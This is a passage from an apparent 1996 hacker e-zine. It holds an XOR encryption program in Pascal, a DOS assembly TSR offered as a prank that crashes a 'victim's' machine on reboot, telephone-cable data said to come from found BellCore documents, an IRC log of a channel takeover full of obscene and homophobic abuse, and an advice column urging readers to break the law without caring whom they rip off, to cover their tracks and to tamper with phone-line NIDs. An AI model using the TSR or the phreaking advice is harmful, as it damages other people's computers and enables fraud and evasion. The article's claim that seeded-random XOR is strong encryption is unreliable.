only have to cycle through every single possible seed value, you would also
need to know the specific language and version to even attempt to crack the
code.
Listing one - infinite length XOR encryption example
Program InfiniteXORKey;
{ An example encryption system that selectively seeds a random number
generator to choose a particular sequence of random numbers, which
are then used to encrypt or decrypt a file.
Syntax
Infinkey INPUTFILE OUTPUTFILE RANDOMSEED
where randomseed is any long integer
}
uses crt, dos;
var Input, Output : file;
Numread, NumWritten : word;
Buffer : array[1..4096] of char;
seed : longint;
i : integer;
VerifyFile : SearchRec;
InputFile, FileName : string;
begin
{ Verify paramaters }
if ParamCount <> 3 then begin
Writeln ('Invalid number of paramaters');
Halt(1);
end;
{ Verify original file's existance }
FindFirst (Paramstr(1), AnyFile, VerifyFile);
InputFile := paramstr(1);
{ Convert file name to uppercase }
For i := 1 to length(ParamStr(1)) do
FileName := Filename + UpCase(InputFile[i]);
If VerifyFile.Name <> FileName then begin
Writeln ('Input file not found');
Halt(2);
end;
Assign (Input, Paramstr(1)); { Open file for input }
Reset (Input , 1 ) ; { Record size = 1 }
Assign (Output, ParamStr(2)); { Open file for output }
Rewrite (Output, 1 ) ; { Record size = 1 }
Writeln ('Encrypting ', FileSize(Input), ' bytes....');
{ Get information, then encrypt }
{ Seed our generator to give an infininte key }
Val ( Paramstr(3), seed, i);
RandSeed := ( seed );
repeat
BlockRead (Input, Buffer, SizeOf(Buffer), NumRead);
for i :=1 to numread
do begin
Buffer[i] := chr(ord(buffer[i]) XOR Random(256));
end;
BlockWrite ( Output, Buffer, NumRead, NumWritten);
until (numread = 0 ) or (numwritten <> numread);
Close( Input );
Close( Output );
end.
Conclusion
While XOR encryption may have been, in the past, viewed as easily crackable,
with the principle of seeding a key of the length of the original data, you
can incorporate easy encryption into your own software. While it still has
its limitations, in that the random number generator used in one language
will not give you the same set of values in another language, if you did need
to make code that was easily portable to other platforms, you could design
your very own random number generator. This would eliminate any of the above
mentioned limitations.
=============================================================================
Hot Boot Crash by |\|\cFill
|\|\cFill e-mailed this to me, and basically what it does is when the
user (err, victim) Reboots, well their computer will crash.. have fun!
hmm... aparrently South American keyboards beboot on ALT+CTRL+BACKSPACE ...
;
; NAME......: HOTBOOT.ASM
; FUNCTION..: <Hot> Reboot when ALT+CTRL+BACKSPACE
; COMPILER..: Turbo Assembler 2.0 or sup.
; DATE......: 10/12/1996
; AUTHOR....: |\|\cFiLL - TeEnAgErS AsSoCiAtEs
;
; TnG Staff:
; - LuCiFeR
; - SoNiC
; - FlaGG
; - |\|\cFiLL
; - AmAzInG
BEL EQU 7
CR EQU 13
LF EQU 10
LAST_VECT EQU 80h
JMP_FAR EQU 0EAh
SHIFT_STATUS EQU 17h
CRT_ADDR EQU 63h
ALT_CTRL_MASK EQU 0Ch ; MASK FOR ALT+CTRL
BKS_SCAN_CODE EQU 0Eh ; BACKSPACE
CSEG SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG
ORG 100h
START: JMP MAIN ; EXECUTE THE SOFT
ORG 100h
;*******************************************************************************
; RESIDENT VARIABLES OF SOFT
;*******************************************************************************
VEC_TAB DD LAST_VECT DUP(?) ; PICK UP INT VECTS
BLOCK_ADDR DW ? ; NEXT SEGMENT
BLOCK_SIZE DW ? ; SEGMENT SIZE
OK$ DB BEL, 'TnG Corp: '
DB 'memmory state restored (if possible).$'
;*******************************************************************************
; KBD_INT - NEW KEYBOARD INTERRUPT
;*******************************************************************************
KBD_INT PROC FAR
PUSH AX DS ; PICK UP ALT. REGISTERS
MOV AX, 40h ; PREPARE TO BIOS DATA AREA
MOV DS, AX
MOV AL, BYTE PTR DS:[SHIFT_STATUS]
AND AL, 0Fh
CMP AL, ALT_CTRL_MASK
JNE BAD_KEY
IN AL, 60h ; SCAN CODE KEY CHECK
CMP AL, BKS_SCAN_CODE
JNE BAD_KEY
IN AL, 61h ; KEYBOARD READ SIGNAL
MOV AH, AL
OR AL, 80h
OUT 61h, AL
XCHG AH, AL
OUT 61h, AL
MOV AL, 20h ; END OF INTERRUPT SIGNAL
OUT 20h, AL
PUSH CS
POP DS
MOV ES, BLOCK_ADDR ; CREATE LAST MCB
CLD
XOR DI, DI
MOV AL, 'Z'
STOSB
XOR AX, AX
STOSW
MOV AX, BLOCK_SIZE
STOSW
XOR AX, AX ; RESTORE INTERRUPT VECTORS
MOV ES, AX
MOV SI, OFFSET VEC_TAB
XOR DI, DI
MOV CX, LAST_VECT * 2
CLI
REP MOVSW
STI
MOV BX, CS ; ACTIVATE PSP
MOV AH, 50h
INT 21h
MOV AX, 40h ; CHANGE VIDEO MODE TO 80x25 TEXT
MOV ES, AX
MOV AL, 7 ; VIDEO MODE 7 - HGC, MDA
CMP ES:[CRT_ADDR], 3B4h
JE SET_MODE
MOV AL, 3 ; VIDEO MODE 3 - CGA, EGA, VGA
SET_MODE: XOR AH, AH
INT 10h
MOV DX, OFFSET OK$ ; DESINSTALATION
MOV AH, 9
INT 21h
MOV AX, 4C00h ; ABORT TO OPERATIVE SYSTEM
INT 21h
BAD_KEY: POP DS AX ; JUMP TO OLD INT 9
DB JMP_FAR
OLD_KBD DD 0
KBD_INT ENDP
END_TSR EQU $
;*******************************************************************************
; NON RESIDENT VARIABLES
;*******************************************************************************
COPYRIGHT$ DB '<HOT> Boot 1.0 - by: |\|\cFiLL @ TnG Corp. 1996.$'
INSTALL_OK$ DB CR, LF, 'ALT+CTRL+BACKSPACE, to make a <hot> boot.'
DB CR, LF, 'NOTE: '
DB 'just use on system CRASH state.$'
LH_ERR$ DB BEL, CR, LF, 'ERROR: '
DB 'do not load on high memmory.$'
;*******************************************************************************
; MAIN - PRINCIPAL SOFT
;*******************************************************************************
MAIN:
MOV DX, OFFSET COPYRIGHT$ ; WHO AM I
MOV AH, 9
INT 21h
MOV AX, CS ; CHECK HIGH MEMMORY
CMP AX, 0A000h ; LOAD
JB LOW_MEM
MOV DX, OFFSET LH_ERR$ ; ERROR
MOV AH, 9
INT 21h
MOV AX, 4CFFh ; END OF SOFT
INT 21h
LOW_MEM: MOV DX, OFFSET INSTALL_OK$ ; INSTALATION
MOV AH, 9
INT 21h
XOR AX, AX ; INTERRUPTS TABLE COPY
MOV DS, AX
MOV CX, LAST_VECT * 2
MOV SI, AX
MOV DI, OFFSET VEC_TAB
CLD
REP MOVSW
PUSH CS ; RESTORE DS
POP DS
MOV ES, DS:[2Ch] ; LEAVE ENVIRONMENT BLOCK
MOV AH, 49h
INT 21h
MOV AX, 3509h ; REDICIONATE INT 9
INT 21h
MOV WORD PTR OLD_KBD, BX
MOV WORD PTR OLD_KBD+2, ES
MOV AX, 2509h
MOV DX, OFFSET KBD_INT
INT 21h
PUSH CS ; CALCULATE SOFT SIZE
POP ES
MOV BX, (OFFSET END_TSR - CSEG + 15) SHR 4
MOV DX, BX
MOV AX, CS
ADD AX, BX
MOV BLOCK_ADDR, AX
MOV AH, 4Ah ; CHANGE MCB SIZE
INT 21h
MOV BX, -1 ; DISP. MEMMORY
MOV AH, 48h
INT 21h
MOV BLOCK_SIZE, BX
MOV AX, 3100h ; GET OUT TO S.O. AND STAY RESIDENT
INT 21h
CSEG ENDS
END START
=============================================================================
the Transatlantic Telephone Cable #8 (TAT-8) info by Keystroke
One night while I was out doing stuff (heh) and I found these BellCore
document just lying around! It turns out they were on the Transatlantic
Telephone Cable #8. aka TAT-8. Here's what they said:
IN SERVICE: SINCE 1988
LOCATION: TUCKERTON, NJ TO WIDEMOUTH, ENGLAND
TO PENMARCH, FRANCE
UNDERSEA PATH LENGTH: 5600km +500km ENGLAND }\ [It branches off in two
directions, as you can see in int picture]
+300km FRANCE }/
WAVELENGTH: 1.3um
FIBER: MONOMODE DEPRESSED CLADDING FIBERS IN A CABLE
1.6 AMPERE CONDUCTOR FOR REPEATER POWER
LIGHT SOURCE: DOUBLE HETEROSTRUCTURE LASER DIODES
MEDIAN LIFETIME = 10^6 HOURS
CAPACITY: 557 Mbps
+ 2 FIBER PAIRS OPERATING AT 295.6 Mbps
+ 2 STANDBY FIBERS
+ 40,000 VOICE CHANNELS (USING ADAPTIVE DELTA PULSE CODED MODULATION)
+ ELECTRONIC MULTIPLEXERS AND DEMULTIPLEXERS CONVERT BETWEEN THE
295.6 Mbps LINES AND THE EUROPEAN 139.264 Mps LINES
TRANSMITTER: LASER DIODE InGaAsP (1290-1330nm)
OUTPUT POWER > 5mW AT 30mA
RECEIVER: InGaAs PIN DIODE
REPEATERS: INTER-REPEATER DISTANCE =[about] 35km-50km, 103 REPEATERS
6 REGENERATORS IN EACH REPEATER, (2 IN ONE DIRECTION,
2 IN THE OTHER DIRECTION, 2 STANDBY)
PARTNERS IN THE TAT-8 PROJECT
34.10% AT&T
27.00% FOREIGN INVESTORS
15.50% BRITISH TELECOM
13.60% MISCELANEOUS INVESTORS
9.80% FRANCE
100.00% HAVOC (:
=============================================================================
For your reading pleasure... the take over of #e.p.a.!
E.P.A. (Elite Phreakers Alliance) were a group of lamers that
invited is to their channel, and as you can see the boys of #phreak made
them regret they ever invited us.. enjoy!
NOTE: this is also online:
www.geocities.com/SiliconValley/8805/e_p_a.log
Session Start: Wed Dec 04 01:17:09 1996
*** Now talking in #e.p.a.
<Scud-O> whats up
<Scud-O> heheh hey el4n
<Sanctity> not much
<Sanctity> hi Scud-O
<Scud-O> hey
<Sanctity> welcome
<el4n> hi scud
*** memor (~derzeter@194.206.81.193) has joined
#e.p.a.
<Scud-O> so tell us about epa
<Sanctity> hey memor
*** ec|ipse (eclypse@kam-as-01b06.direct.ca) has
joined #e.p.a.
<ec|ipse> w3rd
<ec|ipse> i did it
<el4n> what if somone.. how should i say.. was
not "eleet" wanted to join up.. could they
still do this?
<Scud-O> tell us bout epa
<el4n> i mean get in epa an all?
<ec|ipse> do you guys get lots of chicks?
<memor> i thank elite was on bbs only..
<Sanctity> EPA is just basically a bunch of guys
from canada
<Scud-O> k
<Scud-O> hehe chicks
*** YourMom (jlmason@pm028-06.dialip.mich.net)
invites you to join #teenhackers
<Sanctity> lots o chicks
<el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n
et) invites you to join #teenhackers
<el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n
et) invites you to join #teenhackers
<el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n
et) invites you to join #teenhackers
<el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n
et) invites you to join #teenhackers
<el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n
et) invites you to join #teenhackers
<el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n
et) invites you to join #teenhackers
<el4n> yes
<ec|ipse> i will join epa if you gets lots of
chicks
<el4n> YES YES YES
<ec|ipse> i am from canada
<Sanctity> let's get some chicks!
<Scud-O> i am a canuck... moved to us.. but
moving back
<el4n> HOLY SHIT
<el4n> THERES MORE PEOPLE THEN THEN LIKE
ANYWERHE!@$
<el4n> #TEENHACKERS
<Scud-O> hey baby.. im in epa... want to go fuck?
<el4n> IS THE PLACE
<Draim_K> me from canada
<memor> well if ^cna^ is from epa, i'll join heh
<el4n> HEHE
<Scud-O> teen hacers
<Sanctity> chicks!!
<ec|ipse> what about teen hacker chicks?
<Draim_K> * (__)
<Draim_K> * /oo\\________
<Draim_K> * \\ / \\
<Draim_K> * \\/ / \\
<Draim_K> * \\_|___\\_|/.\\
<Draim_K> * || YY| o '
<Draim_K> * || || O
<Draim_K> * ^^ ^^
<ec|ipse> type ~beast el4n
*** Drooke (wassupfoo@stjhts15c43.nbnet.nb.ca)
has joined #E.P.A.
*** Drooke changes topic to "Elite Phreakers
Assotiation"
*** Draim_K has quit IRC (Read error to
Draim_K[stjhts15c43.nbnet.nb.ca]: Connection
reset by peer)
<el4n> ~BEAST
<ec|ipse> el4n has been feeling desperate
lately... el4n notices a lovely cow grazing
out in a field... el4n can't hold it any
longer and runs out into the field and fucks
the cow.
<ec|ipse> §öMêöñê T¥þê ~ßå®
*** Drooke is now known as Draim_K
<ec|ipse> if u want me eleet ass in epa, i better
be getting awps
<Scud-O> let me in to epa!!!!!!!!!!!!!
<el4n> i know redbox teknique
*** DrubleR (~Hey.who.n@btstts01c12.nbnet.nb.ca)
has joined #E.P.A.
<ec|ipse> ok
*** Sanctity sets mode: +o DrubleR
* Sanctity hands DrubleR some of dat stuff!!!
<ec|ipse> well, awp me
<DrubleR> heh heh
<Draim_K> hey sanc
<Draim_K> op
*** Keystroke (ßøZø) (~y@ppp-21.ts-1.mvl.idt.net)
has joined #e.p.a.
<el4n> anybody know why my redbox dosent work?
*** Sanctity sets mode: +o ec|ipse
* Sanctity hands ec|ipse some of dat stuff!!!
<memor> KEYz
<Draim_K> op
<el4n> i need to be oped also
<DrubleR> brb
*** Sanctity sets mode: +o el4n
* Sanctity hands el4n some of dat stuff!!!
<Scud-O> op me
*** el4n sets mode: -o DrubleR
*** el4n sets mode: -o Sanctity
<el4n> oooooops
<memor> db.. :)
* Sanctity takes out his Shotgun and tells
Draim_K you got 10 seconds to run
* Sanctity Draim_K 10
* Sanctity Draim_K 1
* Sanctity pulls out the shotgun and blows
Draim_K 's head off..
*** el4n sets mode: +o Scud-O
<Scud-O> hehe thbjma sel
* Sanctity shows Draim_K a broomstick and some
KY........
<Sanctity> Suddenly some cheap 70's porno film
music comes on [BOOMP-CHICKA-BOOMP-BOWWWWW!]
<Sanctity> Draim_K decides he'd prefer not to
take chances and runs like fuck......
*** ec|ipse sets mode: +m
*** el4n sets mode: +o memor
<memor> heh..
*** el4n sets mode: +o Keystroke
<Scud-O> than you el
<Scud-O> hehehehehehehe
<memor> ah.. db wont change hehe
<el4n> hey
<Scud-O> KEY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
<ec|ipse> w3rd el4n!
*** Keystroke changes topic to "The so called
e.p.a. should be the g.f.a. for gay fags
accociation. You (the one op) sucks a nut! I own
your lame asses"
<Keystroke> hehe
<el4n> im not the president of EPA
<Keystroke> Yea
<Scud-O> you the man!
<Scud-O> heheheh
<el4n> EPA was bought out
<Keystroke> oops
<el4n> terrable takeoveer
* Keystroke didnt know he had ops
<Scud-O> damn
<Scud-O> key rules.. he always has ops
*** Draim_K (wassupfoo@stjhts15c43.nbnet.nb.ca)
has left #E.P.A.
*** Keystroke changes topic to "#phreak owns ewe"
<Scud-O> takeovers rule...
*** Keystroke sets mode: +nt
-memor:#e.p.a.- Scud-O takes rule... And Eats His
Brain.
<Keystroke> hehe
<Scud-O> so now we are in epa right?
<Keystroke> #2600 and #hackers and #phreak and
#hackerz were all mine one night :)
<Scud-O> memor: ?
*** el4n changes topic to "EPA = Educated Pastrey
Associates"
<memor> yea?
*** el4n changes topic to "EPA = Educated
Provalactic Associates"
<Scud-O> what do you mean and eats his brian?
<memor> ha heh my events
*** el4n changes topic to "EPA = Endured
Provalactic Associates"
<Scud-O> heheh im in epa!!!
*** el4n changes topic to "EPA = Endured
Provalactic Association"
*** Keystroke changes topic to "EPA = Eat Penis
and Ass"
<Scud-O> Enviroenmental PRotction agency
<memor> well => take*:#: $nick takes $1 $+ $2 $+
$3 and hits his brain
<Scud-O> Evironmental Protection Agency
<el4n> yes
<el4n> we needed a name change
<el4n> the old one was just to flamboyend
*** arg (~sergio@ppp-24.ibw.com.ni) has joined
#E.P.A.
<Scud-O> hehehe okay
<el4n> flamboyent
<Scud-O> your weird memor
<el4n> fuck i gotta learn to type
<Scud-O> I like that in a phreaker
*** arg (~sergio@ppp-24.ibw.com.ni) has left
#E.P.A.
<memor> iam yea heh..
<el4n> Scud - have you just been having alot of
sex or what?? i havent seen you in ages
<Keystroke> hehe
*** el4n sets mode: -m
<el4n> ok
<el4n> now what do youall have to say for
yerselfs?
<Scud-O> el: yes.. 34-54 times a day!
<el4n> holy gawd
<el4n> no wonder you have no time for fcompouter
<el4n> FUCK
<el4n> LEARN TO TYPE
*** Keystroke has quit IRC (Excess Flood)
<el4n> me that is.
<Scud-O> el: sorry... I dont fuckinh want to
type... I speach itialian damn it
<Scud-O> I cant spell either..
<ec|ipse> heheheh
<ec|ipse> type ~beast
<ec|ipse> my friend hasn't seen them
<Scud-O> actually im getting a bj right now.. so
its hard to type!
<el4n> ~beast
<ec|ipse> el4n has been feeling desperate
lately... el4n notices a lovely cow grazing
out in a field... el4n can't hold it any
longer and runs out into the field and fucks
the cow.
<el4n> ~breast
<el4n> ~kittylitter
<el4n> i see..
<ec|ipse> type ~rlu
*** Keystok (bozo@ppp-21.ts-1.mvl.idt.net) has
joined #e.p.a.
*** ec|ipse sets mode: +o Keystok
<el4n> ~rlu
<ec|ipse> el4n takes a crowbar and breaks into an
RLU and starts ripping it apart... way ta go,
el4n !
<Keystok> I scroolled it 10000000000 times
<Keystok> #gaysex
<Keystok> hehe
<Keystok> Thanks
<el4n> what did you skrewl?
<el4n> skkroll
<ec|ipse> *** Now talking in #gaysex
<ec|ipse> <ec|ipse> i want it up the ass
<Scud-O> do you screw off?
<Keystok> #EPA
<Keystok> not e.p.a.
<Keystok> hehe
<Keystok> Ask what keystroke did
<Keystok> They will cry
*** Digital_X (user@raptor.top.monad.net) has
joined #e.p.a.
<Digital_X> :)
*** Digital_X (user@raptor.top.monad.net) has
left #e.p.a.
<Scud-O> heleo
<Keystok> X!
<ec|ipse> this channel is gross
<Scud-O> yea.. it sucks
<Scud-O> die die die die
*** memor has quit IRC (Read error to memor[194.20
6.81.193]: Connection reset by peer)
<ec|ipse> <ec|ipse> /msg el4n ok, i'll have gay
sex with you :)
<ec|ipse> <ec|ipse> ooops
<el4n> haha
<el4n> scud- o : anyone msg ya?
<Scud-O> i want it now...
*** ec|ipse has quit IRC (Excess Flood)
<Scud-O> msg me.. nope.. dontta thinka so
*** ec|ipse (~eclypse@kam-as-01b06.direct.ca) has
joined #e.p.a.
<el4n> right now??
*** el4n sets mode: +o ec|ipse
*** memor (~derzeter@ppp1.planetb.fr) has joined
#e.p.a.
*** Scud-O sets mode: +o memor
<memor> Error: WSAENOTSOCK (4) by TCPMAN
<ec|ipse> conf info
<Keystok> CYA
<Keystok> CYA
<Keystok> CYA
<Scud-O> no dpont go
<Keystok> CYA
<Scud-O> no
*** Keystok (bozo@ppp-21.ts-1.mvl.idt.net) has
left #e.p.a.
*** Defraz (~just@208.129.36.31) has joined
#E.P.A.
* Sanctity shows el4n a broomstick and some
KY........
<Sanctity> Suddenly some cheap 70's porno film
music comes on [BOOMP-CHICKA-BOOMP-BOWWWWW!]
<Sanctity> el4n decides he'd prefer not to take
chances and runs like fuck......
<el4n> h3h3h3
<el4n> funny stuff san
<Scud-O> hehe
<Sanctity> yeah, my friend wrote this prog
<Sanctity> it rocks
*** Vakant (Drub@btstts01c12.nbnet.nb.ca) has
joined #e.p.a.
<Scud-O> ello
<Scud-O> we own this channel.. you must hail us
all!
<el4n> prog?
<Scud-O> hehehehehehehehehehe
<el4n> you call that a prog?
*** had (~jjh@pm8-13.enter.net) has joined
#E.P.A.
<el4n> i think i m going to add some shit to my
popups.ini
<el4n> n call it a program
<el4n> yeh.. were the EPA
<el4n> BOW DOWN
*** had (~jjh@pm8-13.enter.net) has left #E.P.A.
<Scud-O> yea bow now damn it.. or be killed!!!!!!!
!!!!!
<Scud-O> ehehehehehehehehehheheheheheheheheheheheh
ehehe
* Sanctity grabs Scud-O by the neck and hooks
Scud-O's upper jaw over his thumb..
* Sanctity takes careful aim while stretching
Scud-O wayyy out.....
* Sanctity releases Scud-O..... *twang*
<el4n> i think that i will have to take off the
pants and belt in a second
<el4n> dont piss me off
*** Draim_K (wassupfoo@stjhts15c43.nbnet.nb.ca)
has joined #e.p.a.
<el4n> sanctuty - tell your friends that hes a
homo will ya :)
*** Podunk (zero@ppp39.respool1.medina.ohio.net)
has joined #E.P.A.
*** MuD-SeRV (wassupfoo@stjhts15c43.nbnet.nb.ca)
has joined #e.p.a.
<Scud-O> ewww... that would hurt
*** MuD-SeRV is now known as Ere
<Scud-O> heheh im gunna piss all over you
<Scud-O> ahahahahahahahha
<Scud-O> Im mad.. mda is say!
<Scud-O> get your spite in a bag
<Scud-O> get your bile pilled up...
<Scud-O> its thje best damn vengance youve ever
had! -Scud The Dispossible Assassin!
<Scud-O> i cant type for shit can it folks?
Session Close: Wed Dec 04 01:45:10 1996
=============================================================================
RTFM: The Lamer Journal
Street Smarts
I found this in the Empire Times and well.. I want you to read it. Armitage
says some very true things...
From the Empire Times issue 7
I've read alot in recent magazines and have seen alot on tv recently
about hackers, and it makes me sick. I don't think the perceptions are
accurate. Even though it bothers me, being the laid back individual I am
I don't let it get to me. Maybe that is my fault, maybe it is good though.
I want to send out a message to all the covert hackers and phreakers.
Not many people have such talents that some of us have. Use them wisely, and
think about what you are doing before you do it. I am not saying hacking is
bad (no no, why would anyone think that?). I am just saying that think
about what you are doing and how you can get caught. I don't want people to
get locked up like Mitnick and others. Watch yourselves.
I'm going to keep it short and sweet. This is definatly a period of
busts. Many many fellow hackers have gone 'down'. That is something that
most people consider the worst thing that could ever happen to a member of
the computer underground.
Till the next Empire Times,
armitage@dhp.com
+-----------------------------------------------------------+
Armitage speaks the truth. We are in a period of heavy busts. You
probably will
not have all the time you need to learn before you get busted.
If you cant handle this then stop reading this file and destroy all of the
hacking/phreaking files you may have found. If you are worried of being
busted, you have failed. If you worry about being busted, you are not a
hacker or phreaker. If you worry about being busted, you will be busted.
Still here? Good. Congradulations! You have taken the first step
towards becoming a h/p person. You mut not fear or care! You must not fear
doing illegal things, and you must not care about ripping people or companies
off. If you do, you will get busted my friend.
Second, don't ask for help with EVERY little detail. Most people with
some practice in H/P will not help you. They may help out a little, but the
rest you must find out for yourself. That is what hacking and phreaking is.
It is Exploring. Not ripping people off or doing illegal things, it is the
exploring of systems for KNOWLEDGE! You MUST know this. If you think Hacking
or phreaking is just about having fun, i'm calling the cops right now. Sure
it is fun, but it takes alot of work. Don't expect to be spoon fed everything.
Sure the first stuff is pre-canned for you, but the further you go into things
the more you will have to learn by your own mistakes.
Third, Be VERY (emphasis on VERY) careful with who you share info with
most people on IRC do NOT know what they are talking about and so, they will
only mess things up for you. You must be VERY careful with what you say to
people. I am a very open person online, and one day this will hurt me. I will
get busted probably for trusting the wrong person. Don't make that mistake.
Fourth, COVER YOUR TRACKS!! This is VERY imortante! when you are
messing around with a shell script or program, telnet thru several different
accounts first. In issue 4 at the end I published a list of freenets to use.
So get issue 4 and use those accounts. Also, NEVER call numbers from your
house unless you want to be busted! Use a pay phone or someone elses phone.
I published an article in issue 4 which clearly tells you how to mess with
NIDs to make free phone calls. Just going around your neighborhood should
turn up a few NIDs to play with.
I dont want to sound like i'm condemning you to death or anything,
it is just that it is much harder to stay around in the "underground" these
days.
Safe Hacking & Phreaking-
Scud-O
FoxMulder@worldnet.att.net
+---------------------------------------------------------+
NOTE: if you use a lame nationwide ISP like AOL, P*, Netcom or MSN. Go and
cancel your account NOW! Get a local ISP or use AT&T or earthlink. They
need the money and almost all local ISPs have shell accounts so you can use
scripts!
Or if you only get a SLIP/PPP acount, l0pht and many other places have
shell accounts at low prices you can telnet in to!
Next Month on RTFM:
Basics on hacking
2 Month From Now:
Basics on phreaking
=============================================================================
ROLL CALL & More!
Who is HAVOC Bell Systems?
Scud-O : Linux Lammah
Psycho : All Around Lammah
|\|\cFill : Mad Genius (doing wonders for tNg mIRC v.2.0!)
Keystroke : Mad PLA Insider
Sancho Panza : This boy is so lame he couldn't hack is way out of a
bag! hehehehehe (no wonder he's not in HBS)
The MIA people have been taken off the list!
Cool Undernet Channels:
#phreak
#rewt
Cool People:
UnaBomber (if he's ever on anymore!)
theLURK3R (aka `X`)
demonweed
darkcyde (if he's ever on anymore!)
Rap3d_C0w
luthor
CiND3R
RedTyde (aka ^ReDMaN^)
RedDeath
el4n
LuCiFeR_
X-SeRiAl
yesimlame
fusi0n
KungFuFox
ArcAngel
darcangel
BC219
XiN0 (hehehehehehe.. bwahahahahahahahahahahaha)
all of these fine gents can be found on #phreak
(Who will i add to HBS? find out next month!)
Lamah of the Month:
kradd00d - kradd00d@juno.com
This Month Question(s): Why did it take you SO long to put out the issue?
Well first NO ONE turned in thier articles! (the little punks)
Anyway, I had all my stuff done and on the 15th when this issue was first
going to come out, |\|\cFill send me his article. Psycho is such a lamer
that i had to write his article for him the lame @$$ bitch! And well
Keystroked HD exploded after installing linux (which im going to be doing
soon) and so it took him until today (12/26/96) to send it out to me.
-Oh Well-
(sign)
Next Month's Question: Who are |\|\cFill and Keystroke and Psycho?
Next Month:
This MAY be what we will have in issue 7
- Pagers
- Cell Phones
- A shit load of good UNIX C code stolen from theLURK3R!
- The Practical Mailbomber for every day use
- More from the RTFM: The Lamer Journal
- Much, Much more TBA!
Issue 7 is out Jan. 31st!
cya ya next issue! - The HAVOC Technical Journal Crew
============================================================
= IS this copy of The HAVOC Technical Journal Skunked?
= If this file reads larger than 70177 bytes than this issue
= has been messed with! get a fresh copy from our site:
= www.geocities.com/SiliconValley/8805/
============================================================
